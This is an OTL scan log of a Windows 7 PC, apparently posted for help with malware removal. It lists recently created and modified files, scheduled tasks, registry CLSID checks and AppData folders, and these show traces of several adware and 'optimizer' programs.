[2014/07/27 22:14:11 | 000,956,504 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxVoiceAPO2064.dll
[2014/07/27 22:14:08 | 001,313,904 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxSpeechAPO64.dll
[2014/07/27 22:13:59 | 003,959,384 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxAudioVnN64.dll
[2014/07/27 22:13:52 | 028,343,384 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxAudioVnA64.dll
[2014/07/27 22:13:49 | 014,863,448 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxAudioRealtek64.dll
[2014/07/27 22:13:41 | 002,041,432 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxAudioEQ64.dll
[2014/07/27 22:13:41 | 001,934,424 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxAudioRealtek264.dll
[2014/07/27 22:13:38 | 001,063,512 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxAudioAPOShell64.dll
[2014/07/27 22:13:38 | 000,900,696 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysWow64\MaxxAudioAPOShell.dll
[2014/07/27 22:13:37 | 001,317,976 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxAudioAPO6064.dll
[2014/07/27 22:13:37 | 001,168,472 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxAudioAPO5064.dll
[2014/07/27 22:13:37 | 001,136,728 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxAudioAPO4064.dll
[2014/07/27 22:13:36 | 000,663,296 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxAudioAPO30.dll
[2014/07/27 22:13:36 | 000,318,808 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxAudioAPO20.dll
[2014/07/27 22:13:32 | 000,603,984 | ---- | C] (Knowles Acoustics ) -- C:\windows\SysNative\KAAPORT64.dll
[2014/07/27 22:13:31 | 000,291,488 | ---- | C] (ICEpower a/s) -- C:\windows\SysNative\ICEsoundAPO64.dll
[2014/07/27 22:13:21 | 002,770,976 | ---- | C] (Fortemedia Corporation) -- C:\windows\SysNative\FMAPO64.dll
[2014/07/27 22:13:20 | 000,693,352 | ---- | C] (DTS) -- C:\windows\SysNative\DTSVoiceClarityDLL64.dll
[2014/07/27 22:13:19 | 000,712,296 | ---- | C] (DTS) -- C:\windows\SysNative\DTSSymmetryDLL64.dll
[2014/07/27 22:13:19 | 000,501,184 | ---- | C] (DTS) -- C:\windows\SysNative\DTSU2PLFX64.dll
[2014/07/27 22:13:19 | 000,487,360 | ---- | C] (DTS) -- C:\windows\SysNative\DTSU2PGFX64.dll
[2014/07/27 22:13:19 | 000,415,680 | ---- | C] (DTS) -- C:\windows\SysNative\DTSU2PREC64.dll
[2014/07/27 22:13:18 | 001,756,264 | ---- | C] (DTS) -- C:\windows\SysNative\DTSS2SpeakerDLL64.dll
[2014/07/27 22:13:18 | 001,568,360 | ---- | C] (DTS) -- C:\windows\SysNative\DTSS2HeadphoneDLL64.dll
[2014/07/27 22:13:17 | 000,491,112 | ---- | C] (DTS) -- C:\windows\SysNative\DTSNeoPCDLL64.dll
[2014/07/27 22:13:17 | 000,432,744 | ---- | C] (DTS) -- C:\windows\SysNative\DTSLimiterDLL64.dll
[2014/07/27 22:13:17 | 000,242,792 | ---- | C] (DTS) -- C:\windows\SysNative\DTSLFXAPO64.dll
[2014/07/27 22:13:17 | 000,242,792 | ---- | C] (DTS) -- C:\windows\SysNative\DTSGFXAPO64.dll
[2014/07/27 22:13:17 | 000,241,768 | ---- | C] (DTS) -- C:\windows\SysNative\DTSGFXAPONS64.dll
[2014/07/27 22:13:16 | 001,486,952 | ---- | C] (DTS) -- C:\windows\SysNative\DTSBoostDLL64.dll
[2014/07/27 22:13:16 | 000,428,648 | ---- | C] (DTS) -- C:\windows\SysNative\DTSGainCompensatorDLL64.dll
[2014/07/27 22:13:15 | 006,218,072 | ---- | C] (Dolby Laboratories) -- C:\windows\SysNative\DDPP64A.dll
[2014/07/27 22:13:15 | 000,728,680 | ---- | C] (DTS) -- C:\windows\SysNative\DTSBassEnhancementDLL64.dll
[2014/07/27 22:13:14 | 001,939,800 | ---- | C] (Dolby Laboratories) -- C:\windows\SysNative\DDPD64A.dll
[2014/07/27 22:13:14 | 000,315,736 | ---- | C] (Dolby Laboratories) -- C:\windows\SysNative\DDPO64A.dll
[2014/07/27 22:13:14 | 000,261,464 | ---- | C] (Dolby Laboratories) -- C:\windows\SysNative\DDPA64.dll
[2014/07/27 22:13:13 | 000,113,576 | ---- | C] (Real Sound Lab SIA) -- C:\windows\SysNative\CONEQMSAPOGUILibrary.dll
[2014/07/27 22:08:18 | 000,000,000 | -H-D | C] -- C:\Program Files (x86)\Temp
[2014/07/27 21:14:48 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SystemRequirementsLab
[2014/07/27 21:02:43 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Roaming\SystemRequirementsLab
[2014/07/27 19:46:42 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Local\SanDisk Corporation
[2014/07/26 07:39:02 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Roaming\HD Tune Pro
[2014/07/26 07:38:53 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\HD Tune Pro
[2014/07/25 09:55:01 | 000,000,000 | ---D | C] -- C:\windows\pss
[2014/07/23 23:28:51 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\predm
[2014/07/23 23:23:44 | 000,000,000 | ---D | C] -- C:\ProgramData\374311380
[2014/07/23 23:23:16 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Roaming\GroovorioUpdater
[2014/07/23 23:19:51 | 000,000,000 | ---D | C] -- D:\documents\Optimizer Pro
[2014/07/23 23:19:47 | 000,000,000 | ---D | C] -- C:\ProgramData\TEMP
[2014/07/23 23:18:48 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Local\globalUpdate
[2014/07/23 23:18:48 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\globalUpdate
[2014/07/23 23:18:35 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Optimizer Pro
[2014/07/23 23:17:40 | 000,000,000 | ---D | C] -- C:\ProgramData\f117b93158f620af
[2014/07/23 23:17:33 | 000,000,000 | ---D | C] -- C:\ProgramData\cosstminn
[2014/07/23 23:17:32 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Local\Packages
[2014/07/23 23:17:23 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\cosstminn
[2014/07/23 23:17:22 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Local\Chromatic Browser
[2014/07/23 23:17:21 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Local\Torch
[2014/07/23 23:17:20 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Local\Comodo
[2014/07/23 08:40:10 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Roaming\Monosnap
[2014/07/23 08:37:52 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Local\Monosnap
[2014/07/23 08:37:39 | 000,000,000 | ---D | C] -- C:\ProgramData\Monosnap
[2014/07/19 18:01:11 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Java
[2014/07/19 18:00:51 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/07/17 13:38:27 | 000,000,000 | ---D | C] -- C:\openhard
[2014/07/17 05:49:04 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Local\Adobe
[2014/07/11 18:03:53 | 000,000,000 | ---D | C] -- D:\documents\New folder (2)
[2014/07/08 18:50:54 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Local\{EDDA2BF7-89A5-4779-AD83-E34CC2B78BE2}
[2014/07/08 06:35:02 | 000,000,000 | ---D | C] -- C:\temp
[2014/07/05 17:22:08 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Local\gtk-2.0
[2014/07/05 17:17:26 | 000,000,000 | ---D | C] -- C:\Users\Robin\.gimp-2.8
[2014/07/05 17:11:01 | 000,000,000 | ---D | C] -- C:\Program Files\GIMP 2
[2014/07/05 14:22:57 | 000,000,000 | ---D | C] -- D:\documents\website
[1 C:\windows\*.tmp files -> C:\windows\*.tmp -> ]
 
[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]
 
[2014/08/04 11:02:00 | 000,000,896 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/08/04 10:51:41 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Robin\Desktop\OTL.exe
[2014/08/04 10:40:25 | 000,016,976 | -H-- | M] () -- C:\windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/08/04 10:40:25 | 000,016,976 | -H-- | M] () -- C:\windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/08/04 10:23:00 | 000,000,292 | ---- | M] () -- C:\windows\tasks\Groovorio Updater.job
[2014/08/04 10:08:00 | 000,000,286 | ---- | M] () -- C:\windows\tasks\DSite.job
[2014/08/04 09:53:38 | 000,000,035 | ---- | M] () -- C:\Users\Public\Documents\AtherosServiceConfig.ini
[2014/08/04 09:53:34 | 000,000,892 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/08/04 09:53:26 | 000,065,536 | ---- | M] () -- C:\windows\SysNative\Ikeext.etl
[2014/08/04 09:53:10 | 000,067,584 | --S- | M] () -- C:\windows\bootstat.dat
[2014/08/04 09:53:06 | 3055,386,624 | -HS- | M] () -- C:\hiberfil.sys
[2014/08/04 06:26:26 | 000,001,507 | ---- | M] () -- C:\Users\Robin\Desktop\iexplore.exe - 32bit Shortcut.lnk
[2014/08/04 06:19:11 | 000,001,481 | ---- | M] () -- C:\Users\Robin\Desktop\iexplore.exe - 64bit shortcut.lnk
[2014/08/04 04:28:35 | 000,001,421 | ---- | M] () -- C:\Users\Robin\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
[2014/08/04 03:28:56 | 000,000,020 | ---- | M] () -- C:\windows\ìõ&
[2014/08/03 19:49:18 | 000,043,279 | ---- | M] () -- C:\Users\Robin\AppData\Local\recently-used.xbel
[2014/08/03 18:00:00 | 000,000,466 | ---- | M] () -- C:\windows\tasks\ParetoLogic Registration.job
[2014/08/03 11:39:41 | 000,788,000 | ---- | M] () -- C:\windows\SysNative\PerfStringBackup.INI
[2014/08/03 11:39:41 | 000,666,038 | ---- | M] () -- C:\windows\SysNative\perfh009.dat
[2014/08/03 11:39:41 | 000,124,224 | ---- | M] () -- C:\windows\SysNative\perfc009.dat
[2014/08/02 23:12:58 | 000,007,625 | ---- | M] () -- C:\Users\Robin\AppData\Local\Resmon.ResmonCfg
[2014/07/31 03:54:43 | 000,001,091 | ---- | M] () -- C:\Users\Public\Desktop\FastStone Photo Resizer.lnk
[2014/07/28 15:23:01 | 000,000,141 | ---- | M] () -- C:\Users\Robin\AppData\Roaming\WB.CFG
[2014/07/27 22:19:25 | 000,000,000 | -H-- | M] () -- C:\ProgramData\DP45977C.lfl
[2014/07/27 21:37:13 | 000,015,790 | ---- | M] () -- C:\windows\SysNative\results.xml
[2014/07/23 23:17:23 | 000,000,394 | RHS- | M] () -- C:\ProgramData\ntuser.pol
[2014/07/23 08:37:56 | 000,001,815 | ---- | M] () -- C:\Users\Robin\Desktop\Monosnap for Games.lnk
[2014/07/11 20:32:53 | 000,056,202 | ---- | M] () -- D:\documents\to ICO-1.pdf
[2014/07/11 18:51:19 | 003,191,611 | ---- | M] () -- D:\documents\DOC 70 response letter from lender 17th June 2014.pdf
[2014/07/08 05:07:35 | 000,002,016 | ---- | M] () -- C:\Users\Public\Desktop\Google Slides.lnk
[2014/07/08 05:07:35 | 000,002,014 | ---- | M] () -- C:\Users\Public\Desktop\Google Sheets.lnk
[2014/07/08 05:07:35 | 000,002,004 | ---- | M] () -- C:\Users\Public\Desktop\Google Docs.lnk
[2014/07/06 04:47:50 | 000,932,855 | ---- | M] () -- D:\documents\RegisterPlanBGL58124.pdf
[2014/07/06 04:39:14 | 000,342,211 | ---- | M] () -- D:\documents\1RegisterBGL58124.pdf
[2014/07/05 14:22:27 | 000,177,556 | ---- | M] () -- D:\documents\Checkout Complete.pdf
[1 C:\windows\*.tmp files -> C:\windows\*.tmp -> ]
 
[color=#E56717]========== Files Created - No Company Name ==========[/color]
 
[2030/01/01 23:27:43 | 000,383,786 | RHS- | C] () -- C:\bootmgr
[2014/08/04 06:26:26 | 000,001,507 | ---- | C] () -- C:\Users\Robin\Desktop\iexplore.exe - 32bit Shortcut.lnk
[2014/08/04 06:19:11 | 000,001,481 | ---- | C] () -- C:\Users\Robin\Desktop\iexplore.exe - 64bit shortcut.lnk
[2014/08/04 04:28:35 | 000,001,421 | ---- | C] () -- C:\Users\Robin\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
[2014/08/04 04:28:34 | 000,001,427 | ---- | C] () -- C:\Users\Robin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
[2014/08/04 03:28:47 | 000,000,020 | ---- | C] () -- C:\windows\ìõ&
[2014/08/03 19:49:18 | 000,043,279 | ---- | C] () -- C:\Users\Robin\AppData\Local\recently-used.xbel
[2014/08/02 21:36:01 | 000,000,882 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Error Recovery Guide.lnk
[2014/07/31 03:54:43 | 000,001,091 | ---- | C] () -- C:\Users\Public\Desktop\FastStone Photo Resizer.lnk
[2014/07/27 22:19:25 | 000,000,000 | -H-- | C] () -- C:\ProgramData\DP45977C.lfl
[2014/07/27 22:15:37 | 002,117,424 | ---- | C] () -- C:\windows\SysNative\SStudio.dll
[2014/07/27 22:15:20 | 005,804,772 | ---- | C] () -- C:\windows\SysNative\drivers\rtvienna.dat
[2014/07/27 22:15:02 | 001,099,203 | ---- | C] () -- C:\windows\SysNative\drivers\RTAIODAT.DAT
[2014/07/27 22:13:12 | 000,033,592 | ---- | C] () -- C:\windows\SysNative\audioLibVc.dll
[2014/07/27 22:13:11 | 000,109,848 | ---- | C] () -- C:\windows\SysNative\AcpiServiceVnA64.dll
[2014/07/23 23:23:17 | 000,000,292 | ---- | C] () -- C:\windows\tasks\Groovorio Updater.job
[2014/07/23 23:17:23 | 000,000,394 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/07/23 08:37:56 | 000,001,815 | ---- | C] () -- C:\Users\Robin\Desktop\Monosnap for Games.lnk
[2014/07/11 20:32:52 | 000,056,202 | ---- | C] () -- D:\documents\to ICO-1.pdf
[2014/07/11 18:51:19 | 003,191,611 | ---- | C] () -- D:\documents\DOC 70 response letter from lender 17th June 2014.pdf
[2014/07/06 04:47:50 | 000,932,855 | ---- | C] () -- D:\documents\RegisterPlanBGL58124.pdf
[2014/07/06 04:39:12 | 000,342,211 | ---- | C] () -- D:\documents\1RegisterBGL58124.pdf
[2014/07/05 17:13:57 | 000,000,908 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk
[2014/07/05 14:22:25 | 000,177,556 | ---- | C] () -- D:\documents\Checkout Complete.pdf
[2013/10/09 06:45:21 | 000,000,000 | ---- | C] () -- C:\ProgramData\Piano Hard
[2013/10/09 06:45:19 | 000,000,000 | ---- | C] () -- C:\ProgramData\NetServices
[2013/09/05 20:08:17 | 000,000,141 | ---- | C] () -- C:\Users\Robin\AppData\Roaming\WB.CFG
[2013/09/05 20:08:17 | 000,000,006 | ---- | C] () -- C:\Users\Robin\AppData\Roaming\WBPU-TTL.DAT
[2013/06/12 19:56:58 | 000,000,037 | -HS- | C] () -- C:\Users\Robin\AppData\Local\70149b02515b3bb20dd492.47983420
[2013/05/25 17:49:20 | 000,000,046 | ---- | C] () -- C:\Users\Robin\.gtk-bookmarks
[2013/05/22 20:43:48 | 000,974,848 | ---- | C] () -- C:\windows\SysWow64\cis-2.4.dll
[2013/05/22 20:43:48 | 000,081,920 | ---- | C] () -- C:\windows\SysWow64\issacapi_bs-2.3.dll
[2013/05/22 20:43:48 | 000,065,536 | ---- | C] () -- C:\windows\SysWow64\issacapi_pe-2.3.dll
[2013/05/22 20:43:48 | 000,057,344 | ---- | C] () -- C:\windows\SysWow64\issacapi_se-2.3.dll
[2013/02/19 13:43:58 | 013,913,600 | ---- | C] () -- C:\windows\SysWow64\ig4icd32.dll
[2012/12/17 02:12:00 | 000,007,625 | ---- | C] () -- C:\Users\Robin\AppData\Local\Resmon.ResmonCfg
[2012/11/27 12:13:28 | 000,000,247 | ---- | C] () -- C:\Users\Robin\AppData\Roaming\burnaware.ini
[2012/08/05 10:16:50 | 000,000,000 | ---- | C] () -- C:\windows\SysWow64\cd.dat
[2012/07/08 23:09:37 | 000,001,077 | ---- | C] () -- C:\Users\Robin\Documents - Shortcut.lnk
[2012/07/07 22:18:39 | 000,000,000 | -H-- | C] () -- C:\ProgramData\PKP_DLev.DAT
[2012/07/07 22:18:39 | 000,000,000 | ---- | C] () -- C:\Users\Robin\AppData\Roaming\Pianos and Keyboards
[2012/07/07 22:18:38 | 000,000,000 | -H-- | C] () -- C:\ProgramData\PKP_DLet.DAT
[2012/07/07 22:18:38 | 000,000,000 | -H-- | C] () -- C:\ProgramData\PKP_DLes.DAT
[2012/07/07 22:18:38 | 000,000,000 | ---- | C] () -- C:\Users\Robin\AppData\Roaming\Piano Med
[2012/07/07 22:18:38 | 000,000,000 | ---- | C] () -- C:\Users\Robin\AppData\Roaming\Piano Hard
 
[color=#E56717]========== ZeroAccess Check ==========[/color]
 
[2009/07/14 05:55:00 | 000,000,227 | RHS- | M] () -- C:\windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/03/25 03:43:12 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/03/25 03:09:54 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 02:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/21 04:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 02:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
[color=#E56717]========== LOP Check ==========[/color]
 
[2013/09/05 18:10:12 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\0D0S1L2Z1P1B0T1P1B2Z
[2011/09/07 21:13:00 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Amazon
[2013/01/23 05:39:54 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\ASUS WebStorage
[2012/07/28 10:45:44 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Babylon
[2014/03/10 14:42:54 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\DigitalVolcano
[2013/09/05 18:08:37 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\DSite
[2012/07/12 01:51:29 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\EasyDuplicateFinder
[2013/09/23 01:23:47 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\FireShot
[2012/08/24 12:12:16 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\FreeCall
[2012/07/05 18:29:09 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Fujitsu
[2014/07/23 23:23:16 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\GroovorioUpdater
[2014/07/26 07:39:02 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\HD Tune Pro
[2014/07/18 19:19:20 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Hotspot Shield
[2011/09/07 21:49:43 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Infineon
[2013/10/09 05:36:53 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\JAM Software
[2012/07/04 22:58:00 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Leadertech
[2014/07/23 08:40:10 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Monosnap
[2012/09/27 13:41:50 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Nikon
[2014/05/08 22:12:44 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\OpenCandy
[2013/09/13 11:28:38 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\OpenOffice
[2012/12/24 16:05:29 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Opera
[2013/09/22 13:05:56 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Oracle
[2014/03/10 14:26:29 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Philipp Winterberg
[2014/05/10 05:05:37 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Pine Grove Software
[2013/09/07 00:13:58 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Samsung
[2014/01/07 15:25:21 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\SanDisk SecureAccess
[2014/01/08 23:45:26 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Seagate
[2013/06/22 01:12:29 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Sevas-S
[2014/05/04 08:54:35 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Softland
[2014/07/27 21:02:43 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\SystemRequirementsLab
[2012/07/06 00:33:35 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\TP
[2014/01/11 03:03:31 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\TuneUp Software
[2014/04/11 00:09:59 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Updater
[2013/09/08 03:09:00 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\WandoujiaUsbDriver
[2013/10/26 18:05:26 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Waterfox Limited
[2014/07/30 11:10:13 | 000,000,000 | ---D | M] -- C:\Users\Robin\AppData\Roaming\Windows Live Writer
 
[color=#E56717]========== Purity Check ==========[/color]
 
 
 
[color=#E56717]========== Files - Unicode (All) ==========[/color]
[2014/01/05 04:02:21 | 000,000,059 | ---- | M] ()(C:\windows\SysWow64\??) -- C:\windows\SysWow64\˱
[2014/01/05 04:02:21 | 000,000,059 | ---- | C] ()(C:\windows\SysWow64\??) -- C:\windows\SysWow64\˱

< End of report >